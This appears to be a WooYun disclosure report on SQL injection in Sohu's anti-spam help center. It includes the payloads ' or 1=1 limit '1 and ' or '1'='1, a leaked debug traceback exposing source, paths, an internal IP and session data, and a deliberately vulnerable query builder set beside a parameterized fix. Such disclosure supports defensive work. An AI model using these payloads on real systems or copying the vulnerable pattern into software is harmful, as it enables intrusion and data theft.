Vulnerability summary (followers: 24)
Defect ID: wooyun-2011-01569
Title: SQL injection and information disclosure in the Sohu anti-spam help center
Vendor: Sohu.com
Author: 路人甲
Submitted: 2011-03-11 17:22
Fix time: 2011-04-11 00:00
Public disclosure: 2011-04-11 00:00
Type: SQL injection
Severity (self-rated): Low
Self-rated Rank: 5
Status: confirmed by vendor
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2011-03-11: details sent to the vendor, awaiting vendor action
2011-03-11: vendor confirmed; details visible to the vendor only
2011-03-21: details opened to core white hats and domain experts
2011-03-31: details opened to regular white hats
2011-04-10: details opened to intern white hats
2011-04-11: details opened to the public
Brief description:
The Sohu anti-spam center is written in Python. Because user-supplied parameters are formatted straight into SQL statements without escaping, and because the application runs with its debug page enabled, an attacker can inject SQL and, through the debug page, read the application's source, file system paths, session contents and configuration tables.
Detailed description:
Submitting the IP lookup form with ip = ' or 1=1 limit '1 (together with a valid CAPTCHA code) makes the application answer with the web.py debug page, so the service is running with debugging enabled. Below is that page with its HTML stripped, frames listed innermost first, each with its source context and the local variables it exposed. It shows the concatenated SQL statement, the application's own source around the injection point, absolute paths of the deployment, the session contents (including the expected CAPTCHA value) and the module-level configuration tables.

MySQLdb ProgrammingError(1064, "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' at line 1")

Frame 1 (MySQLdb error handler), local vars:
    error      = (<class '_mysql_exceptions.ProgrammingError'>, ProgrammingError(1064, "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' at line 1"))
    errorclass = <class '_mysql_exceptions.ProgrammingError'>
    errorvalue = ProgrammingError(1064, "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' at line 1")

Frame 2 (MySQLdb cursor execute), local vars:
    ListType  = <type 'list'>
    TupleType = <type 'tuple'>
    args      = []
    charset   = 'utf8'
    db        = <weakproxy at 0x14a6ee68 to Connection at 0x143232f0>
    exc       = <class '_mysql_exceptions.ProgrammingError'>
    exc_info  = <built-in function exc_info>
    query     = "select * from IP where KEYSTR='' OR 1=1 LIMIT '1'"
    self      = <MySQLdb.cursors.Cursor object at 0x14812810>
    value     = ProgrammingError(1064, "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' at line 1")

Frame 3 (cursor wrapper around MySQLdb, line 449):
    442            if self._con._maxusage:
    443                if self._con._usage >= self._con._maxusage:
    444                    # the connection was used too often
    445                    raise self._con._failure
    446            if execute:
    447                self._setsizes()
    448            method = getattr(self._cursor, name)
    449            result = method(*args, **kwargs)  # try to execute        <-- error raised here
    450            if execute:
    451                self._clearsizes()
    452        except self._con._failures, error:  # execution error
    453            try:
    454                cursor2 = self._con._cursor(
    455                    *self._args, **self._kwargs)  # open new cursor
  local vars:
    args    = ("select * from IP where KEYSTR='' OR 1=1 LIMIT '1'", [])
    execute = True
    kwargs  = {}
    method  = <bound method Cursor.execute of <MySQLdb.cursors.Cursor object at 0x14812810>>
    name    = 'execute'
    self    = <MySQLdb.cursors.Cursor object at 0x14812810>

Frame 4 (web.db, _db_execute, line 529):
    522            self.ctx.dbq_count += 1
    523
    524            try:
    525                a = time.time()
    526                paramstyle = getattr(self, 'paramstyle', 'pyformat')
    527                out = cur.execute(sql_query.query(paramstyle),
    528                                  [self._py2sql(x)
    529                                   for x in sql_query.values()])        <-- error raised here
    530                b = time.time()
    531            except:
    532                if self.printing:
    533                    print >> debug, 'ERR:', str(sql_query)
    534                if self.ctx.transactions:
    535                    self.ctx.transactions[-1].rollback()
  local vars:
    a          = 1299834677.469094
    cur        = <MySQLdb.cursors.Cursor object at 0x14812810>
    paramstyle = 'pyformat'
    self       = <web.db.MySQLDB instance at 0x2ad35da123b0>
    sql_query  = <sql: "select * from IP where KEYSTR='' OR 1=1 LIMIT '1'">

Frame 5 (web.db, query, line 578):
    571
    572        if not processed and not isinstance(sql_query, SQLQuery):
    573            sql_query = reparam(sql_query, vars)
    574
    575        if _test: return sql_query
    576
    577        db_cursor = self._db_cursor()
    578        self._db_execute(db_cursor, sql_query)        <-- error raised here
    579
    580        if db_cursor.description:
    581            names = [x[0] for x in db_cursor.description]
    582            def iterwrapper():
    583                row = db_cursor.fetchone()
    584                while row:
  local vars:
    _test     = False
    db_cursor = <MySQLdb.cursors.Cursor object at 0x14812810>
    processed = False
    self      = <web.db.MySQLDB instance at 0x2ad35da123b0>
    sql_query = <sql: "select * from IP where KEYSTR='' OR 1=1 LIMIT '1'">
    vars      = {}

Frame 6 (the application's code.py, queryFrmDb, line 119; the injection point. The user-facing strings were mojibake in the dump and are given here in English):
    112            result = queryFrmDb("SENDER",input.email)
    113            if len(result) == 0:
    114                return simplejson.dumps({"result": u"%s is not on the blacklist!" %input.email})
    115            else:
    116                return simplejson.dumps({"info": result})
    117    def queryFrmDb(table,key):
    118        curtime = time.time()
    119        rs = db.query("select * from %s where KEYSTR='%s'" %(table,key.upper()))        <-- error raised here
    120        result=[]
    121        for r in rs:
    122            d = dict()
    123            if r.ENDTIME == 0:
    124                d['result'] = u"<dd>%s is on the blacklist (permanent)</dd>" % key
    125            else:
  local vars:
    curtime = 1299834677.468873
    key     = u"' or 1=1 limit '1"
    table   = 'IP'

Frame 7 (code.py, queryip.POST, line 214):
    207
    208        def POST(self, *arg):
    209            input = web.input()
    210            session._cleanup()
    211            session._load()
    212            if input.code != session.captcha:
    213                return simplejson.dumps({'error': u'CAPTCHA entered incorrectly, please re-enter'})
    214            result = queryFrmDb("IP",input.ip)        <-- error raised here
    215            if len(result) == 0:
    216                return simplejson.dumps({"result": u"%s is not on the blacklist!" %input.ip})
    217            else:
    218                return simplejson.dumps({"info": result})
    219
    220    class customer(sitepage):
  local vars:
    arg   = (u'',)
    input = <Storage {'ip': u"' or 1=1 limit '1", 'code': u'science'}>
    self  = <code.queryip instance at 0x14a84f80>

Frame 8 (web.application, handle_class, line 359):
    352        def handle_class(cls):
    353            meth = web.ctx.method
    354            if meth == 'HEAD' and not hasattr(cls, meth):
    355                meth = 'GET'
    356            if not hasattr(cls, meth):
    357                raise web.nomethod(cls)
    358            tocall = getattr(cls(), meth)
    359            return tocall(*args)        <-- error raised here
    360
    361        def is_class(o): return isinstance(o, (types.ClassType, type))
    362
    363        if f is None:
    364            raise web.notfound()
    365        elif isinstance(f, application):
  local vars:
    args   = [u'']
    cls    = <class code.queryip at 0x2ad35d9fcfb0>
    meth   = u'POST'
    tocall = <bound method queryip.POST of <code.queryip instance at 0x14a84f80>>

Frame 9 (web.application, line 384; its fvars local is the whole global namespace of the application module):
    377        elif '.' in f:
    378            x = f.split('.')
    379            mod, cls = '.'.join(x[:-1]), x[-1]
    380            mod = __import__(mod, globals(), locals(), [""])
    381            cls = getattr(mod, cls)
    382        else:
    383            cls = fvars[f]
    384            return handle_class(cls)        <-- error raised here
    385        elif hasattr(f, '__call__'):
    386            return f()
    387        else:
    388            return web.notfound()
    389
    390        def _match(self, mapping, value):
  local vars:
    args  = [u'']
    cls   = <class code.queryip at 0x2ad35d9fcfb0>
    f     = u'queryip'
    fvars = {
        'MySQLdb': <module 'MySQLdb' from '/opt/sohumc/lib/python2.6/site-packages/MySQL_python-1.2.2-py2.6-linux-x86_64.egg/MySQLdb/__init__.pyc'>,
        '__builtins__': {the standard Python 2.6 '__builtin__' namespace, copyright/credits/license banners included; omitted here},
        '__doc__': None,
        '__file__': '/root/mail-info/code.pyc',
        '__name__': 'code',
        '__package__': None,
        'about': <class code.about at 0x2ad35da180b0>,
        'app': <web.application.application instance at 0x2ad35da12320>,
        'captcha': <class code.captcha at 0x2ad35da18110>,
        'customer': <class code.customer at 0x2ad35da18050>,
        'db': <web.db.MySQLDB instance at 0x2ad35da123b0>,
        'hello': <class code.hello at 0x2ad35d9fcd70>,
        'policy': <class code.policy at 0x2ad35d9fce30>,
        'postmaster': <class code.postmaster at 0x2ad35d9fce90>,
        'queryFrmBlack': <function queryFrmBlack at 0x2ad35da14668>,
        'queryFrmDb': <function queryFrmDb at 0x2ad35da14140>,
        'queryip': <class code.queryip at 0x2ad35d9fcfb0>,
        'queryreject': <class code.queryreject at 0x2ad35d9fcf50>,
        'querysender': <class code.querysender at 0x2ad35d9fcef0>,
        're': <module 're' from '/opt/sohumc/lib/python2.6/re.pyc'>,
        'reject_info': {   # blacklist reason code -> explanation (UTF-8 Chinese in the dump, translated here)
            'BLACKIP':       'an administrator added it to the blacklist',
            'BLACKRCPT':     'an administrator added it to the recipient blacklist',
            'BLACKSENDER':   'an administrator added it to the blacklist',
            'CBIP':          'the IP was blacklisted because rejections for sending suspected spam reached the limit',
            'CBSENDER':      'the sender was blacklisted because rejections for sending suspected spam reached the limit',
            'DELIPFRMB':     'an administrator removed it from the blacklist',
            'DELIPFRMW':     'an administrator removed it from the whitelist',
            'DELRCPTFRMR':   'an administrator removed it from the recipient blacklist',
            'DELSENDERFRMB': 'an administrator removed it from the blacklist',
            'DELSENDERFRMW': 'an administrator removed it from the whitelist',
            'HBIP':          'the IP was blacklisted because rejections for sending mail while impersonating a mail service provider reached the limit',
            'OKIP':          'the IP was blacklisted because it sent too many messages, or too frequently, reaching the limit',
            'OKSENDER':      'the sender was blacklisted because it sent too many messages, or too frequently, reaching the limit',
            'RBSENDER':      'the sender was blacklisted because the number of messages it sent to blacklisted users reached the limit',
            'SBSENDER':      'the sender, already on the blacklist, kept sending; rejections reached the limit and it was blacklisted',
            'UNIP':          'the IP was blacklisted because rejections for sending mail to nonexistent users reached the limit',
            'UNSENDER':      'the sender was blacklisted because rejections for sending mail to nonexistent users reached the limit',
            'WHITEIP':       'an administrator added it to the whitelist',
            'WHITESENDER':   'an administrator added it to the whitelist',
        },
        'rule': <class code.rule at 0x2ad35d9fcdd0>,
        'session': <Storage {'ip': u'10.10.71.25', 'session_id': '1a2ca39db8c3900055e5de9437bbff98e7272114', 'captcha': 'science'}>,
        'simplejson': <module 'simplejson' from '/opt/sohumc/lib/python2.6/site-packages/simplejson-1.9.2-py2.6-linux-x86_64.egg/simplejson/__init__.pyc'>,
        'sitepage': <class code.sitepage at 0x2ad35d9fcd10>,
        'smtp_reject': [   # (id, SMTP reply code, reason, advice); Chinese text translated
            ('1',  '450 4.1.8',  'sender rejected',               'check the sender address'),
            ('2',  '554 5.7.1',  'sender rejected',               'check the sender address'),
            ('3',  '504 5.5.2',  'sender rejected',               'check the sender address'),
            ('4',  '550 5.1.1',  'recipient rejected',            'check the recipient address'),
            ('5',  '554 5.7.1',  'recipient rejected',            'check the recipient address'),
            ('6',  '450 4.1.8',  'sender rejected',               'check the DNS configuration'),
            ('7',  '552 5.3.4',  'message size exceeds the limit', 'reduce the size of the message'),
            ('8',  '503 5.5.0',  'connection rejected',           'follow the protocol rules'),
            ('9',  '553 5.7.0',  'IP address rejected',           'stop sending and wait to be unblocked'),
            ('10', '553 5.7.1',  'sender rejected',               'stop sending and wait to be unblocked'),
            ('11', '553 5.7.2',  'recipient rejected',            'contact the recipient to change their mailbox configuration'),
            ('12', '553 5.7.3',  'content rejected',              'stop sending and wait to be unblocked'),
            ('13', '553 5.7.4',  'IP address rejected',           'stop sending and wait to be unblocked'),
            ('14', '421 4.2.1',  'temporary error',               'retry'),
            ('15', '553 5.7.3 ', 'sending attachments is not supported', 'remove the attachment and retry'),
        ],
        'smtp_reject_info': [   # (id, full SMTP reply, cause, advice); Chinese text translated
            ('1', '450 4.1.8 <***@***>: Sender address rejected: Domain not found',
                  'the domain name in the sender address cannot be resolved',
                  'contact your network administrator and have them check whether an incorrect DNS configuration is the cause'),
            ('2', '554 5.7.1 <***@***>: Sender address rejected: Access denied',
                  'the domain in the sender address is a Sohu domain, but the user is not a Sohu user (sending while impersonating a Sohu user)',
                  'check whether the sender address is correct, or confirm that the domain has been deregistered from the Sohu enterprise domains'),
            ('3', '504 5.5.2 <***>: Sender address rejected: need fully-qualified address',
                  'the sender address is written in a format' (the pasted dump is cut off at this point)
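The two defects above, side by side as an added example that is not part of the original report or of Sohu's code: build_vulnerable_sql reproduces the string construction of the page's queryFrmDb (upper-cased user input pasted into the statement), and query_fixed is the hardened form with the value bound as a parameter and the table name checked against an allowlist, since placeholders cannot bind identifiers. An in-memory SQLite database with constructed rows stands in for the MySQL IP table (assumption: the same KEYSTR/ENDTIME columns). MySQL rejected the report's LIMIT '1' with the 1064 error shown in the traceback, so the demonstration uses the quote-balanced payload ' or '1'='1, which dumps the whole table.

```python
import sqlite3

# Constructed sample rows standing in for the IP blacklist table seen in the
# traceback; only the two columns the page's code reads (KEYSTR, ENDTIME).
# ENDTIME == 0 is what the page's code treats as a permanent entry.
SAMPLE_IP_ROWS = [
    ("192.0.2.10", 0),
    ("192.0.2.11", 1300000000),
    ("198.51.100.7", 0),
]

# Only the table names the page's handlers actually pass ("IP" and "SENDER").
ALLOWED_TABLES = ("IP", "SENDER")


def make_db():
    """In-memory SQLite stand-in for the MySQL database (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE IP (KEYSTR TEXT, ENDTIME INTEGER)")
    conn.execute("CREATE TABLE SENDER (KEYSTR TEXT, ENDTIME INTEGER)")
    conn.executemany("INSERT INTO IP VALUES (?, ?)", SAMPLE_IP_ROWS)
    return conn


def build_vulnerable_sql(table, key):
    """Exactly how queryFrmDb on the page builds its statement: the user's
    input is upper-cased and formatted into the SQL text, quotes and all."""
    return "select * from %s where KEYSTR='%s'" % (table, key.upper())


def query_vulnerable(conn, table, key):
    """Vulnerable lookup: a quote in `key` ends the string literal and the
    rest of the input is executed as SQL."""
    return conn.execute(build_vulnerable_sql(table, key)).fetchall()


def query_fixed(conn, table, key):
    """Hardened lookup: the value travels as a bound parameter, so quote
    characters in it can never terminate the literal; the table name is
    checked against a fixed allowlist because a placeholder cannot bind an
    identifier."""
    if table not in ALLOWED_TABLES:
        raise ValueError("unexpected table name: %r" % (table,))
    sql = "select * from %s where KEYSTR=?" % table
    return conn.execute(sql, (key.upper(),)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    # The statement the traceback shows for the report's payload.
    print(build_vulnerable_sql("IP", "' or 1=1 limit '1"))
    payload = "' or '1'='1"
    print("vulnerable:", query_vulnerable(conn, "IP", payload))  # every row
    print("fixed:     ", query_fixed(conn, "IP", payload))       # no rows
```

In web.py itself the hardened lookup is `db.select(table, where='KEYSTR = $key', vars={'key': key.upper()})`, which web.py parametrizes; the debug traceback stops being served once `web.config.debug = False` is set before the application runs.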
Proof of vulnerability:
Fix:
Er, correct configuration plus correct filtering: turn the debug page off in production, and pass user input to the database as bound query parameters instead of formatting it into the SQL string.
Copyright notice: when reposting, please credit the source, 路人甲@乌云 (WooYun)
Vulnerability response
Vendor response:
Severity: Medium
Rank: 6
Confirmed: 2011-03-11 17:41
Vendor reply:
Thanks for the report, we will deal with it right away.
Latest status:
None